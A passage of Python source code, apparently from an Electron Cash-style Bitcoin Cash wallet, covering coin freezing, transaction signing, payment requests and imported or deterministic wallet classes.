`utxo` may also be a set of prevout:n strings in which case a set is
returned which is the intersection of the internal frozen coin sets
and the `utxo` set. """
assert isinstance(utxo, (str, dict, set))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
elif isinstance(utxo, set):
# set is returned
return (self.frozen_coins | self.frozen_coins_tmp) & utxo
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
def set_frozen_state(self, addrs, freeze):
"""Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable."""
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary=False):
"""Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets all in 1 call. Thus after a
call to `set_frozen_coin_state(utxos, False), both the temporary and the
persistent frozen sets are cleared of all coins in `utxos`."""
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add(utxo)
def discard(utxo):
self.frozen_coins.discard(utxo)
self.frozen_coins_tmp.discard(utxo)
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation(utxo)
ok += 1
elif isinstance(utxo, dict):
# Note: we could do an is_mine check here for each coin dict here,
# but since all code paths leading to this branch always pass valid
# coins that are "mine", we removed the check to save CPU cycles.
#
# So an O(M logN) algorithm becomes O(M) without the is_mine check,
# where M = number of coins and N = number of addresses.
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation(txo)
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def _slp_callback_on_status(self, event, *args):
if self.is_slp and args[0] == 'connected':
self.activate_slp()
def start_threads(self, network):
self.network = network
if self.network:
if self.is_slp:
# Note: it's important that SLP data structures are defined
# before the network (SPV/Synchronizer) callbacks are installed
# otherwise we may receive a tx from the network thread
# before SLP objects are properly constructed.
self.slp_graph_0x01 = slp_validator_0x01.shared_context
self.slp_graph_0x01_nft = slp_validator_0x01_nft1.shared_context_nft1
self.activate_slp()
self.network.register_callback(self._slp_callback_on_status, ['status'])
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
self.cashacct.start(self.network) # start cashacct network-dependent subsystem, nework.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
# Note: syncrhonizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
# because these objects need to do thier clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
# Now no references to the syncronizer or verifier
# remain so they will be GC-ed
if self.is_slp:
# NB: it's important this be done here after network
# callbacks are torn down in the above lines.
self.network.unregister_callback(self._slp_callback_on_status)
jobs_stopped = self.slp_graph_0x01.stop_all_for_wallet(self, timeout=2.0)
self.print_error("Stopped", len(jobs_stopped), "slp_0x01 jobs")
#jobs_stopped = self.slp_graph_0x01_nft.stop_all_for_wallet(self)
#self.print_error("Stopped", len(jobs_stopped), "slp_0x01_nft jobs")
self.slp_graph_0x01_nft.kill()
self.slp_graph_0x01, self.slp_graph_0x01_nft = None, None
self.storage.put('stored_height', self.get_local_height())
self.save_network_state()
def save_network_state(self):
"""Save all the objects which are updated by the network thread. This is called
periodically by the Android app during long synchronizations.
"""
with self.lock:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None, *, timeout=None):
tstart = time.time()
def check_timed_out():
if timeout is not None and time.time() - tstart > timeout:
raise TimeoutException()
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
check_timed_out()
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
check_timed_out()
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
break # ok, it's old. not need to keep looping
return age > age_limit
def cpfp(self, tx, fee, sign_schnorr=None):
''' sign_schnorr is a bool or None for auto '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
otype, address, value = o
if otype == TYPE_ADDRESS and self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(txid+':%d'%i)
if not item:
return
self.add_input_info(item)
inputs = [item]
outputs = [(TYPE_ADDRESS, address, value - fee)]
locktime = self.get_local_height()
# note: no need to call tx.BIP_LI01_sort() here - single input/output
return Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def add_input_info_for_bitcoinfiles(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
if not x_pubkey[0:2] in ['02', '03', '04']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
else:
c, index = k.scan_for_pubkey_index(x_pubkey)
if c == 0:
addr = self.receiving_addresses[index]
elif c == 1:
addr = self.change_addresses[index]
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password, *, use_cache=False, anyonecanpay=False):
""" Sign a transaction, requires password (may be None for password-less
wallets). If `use_cache` is enabled then signing will be much faster.
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Warning: If you modify non-signature parts of the transaction
afterwards, do not use `use_cache`! """
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password, use_cache=use_cache, anyonecanpay=anyonecanpay)
except UserCancelled:
continue
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_ui_string()
if r.get('token_id', None):
amount_text = str(r['amount'])
else:
amount_text = format_satoshis(r['amount'])
if addr.FMT_UI == addr.FMT_CASHADDR:
out['URI'] = '{}:{}?amount={}'.format(networks.net.CASHADDR_PREFIX,
addr_text, amount_text)
elif addr.FMT_UI == addr.FMT_SLPADDR:
if r.get('token_id', None):
token_id = r['token_id']
out['URI'] = '{}:{}?amount={}-{}'.format(networks.net.SLPADDR_PREFIX,
addr_text, amount_text, token_id)
else:
out['URI'] = '{}:{}?amount={}'.format(networks.net.SLPADDR_PREFIX,
addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
if not 'index_url' in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
if self.up_to_date:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, token_id=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(Hash(addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if token_id:
d['token_id'] = token_id
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self, write=True):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.save_labels() # In case address labels were set or cleared.
if write:
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True, save=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
if save:
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message, save=save) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True,
save=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None, save=save)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
if save:
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
def f(x):
try:
addr = x['address']
return self.get_address_index(addr) or addr
except:
return addr
return sorted(m, key=f)
except TypeError:
# See issue #1231 -- can get inhomogenous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
wants to resynch the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self._slp_txo.clear(); self.slpv1_validity.clear(); self.token_types.clear(); self.tx_tokinfo.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
''' Returns True if this wallet type is compatible.
`reason` is an optional list where you would like a translated string
of why Schnorr isn't possible placed (on False return). '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
# time has passed that air-gapped systems are unlikely to not
# have Schnorr enabled by default.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
''' Enable schnorr for this wallet. Note that if Schnorr is not possible,
(due to missing libs or invalid wallet type) is_schnorr_enabled() will
still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
if self.keystore is not None and self.keystore.can_change_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def get_change_addresses(self):
return []
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows user to re-add PK again and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self, include_change=False):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class Slp_ImportedAddressWallet(ImportedAddressWallet):
# Watch-only wallet of imported addresses
wallet_type = 'slp_imported_addr'
def __init__(self, storage):
self._sorted = None
storage.put('wallet_type', self.wallet_type)
super().__init__(storage)
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self, include_change=False):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Slp_ImportedPrivkeyWallet(ImportedPrivkeyWallet):
# wallet made of imported private keys
wallet_type = 'slp_imported_privkey'
def __init__(self, storage):
storage.put('wallet_type', self.wallet_type)
Abstract_Wallet.__init__(self, storage)
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False, save=True):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
if save:
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change, save=False)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change, save=False)
def synchronize(self):
with self.lock:
if self.storage.get('auto_maintain_gap', True):
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
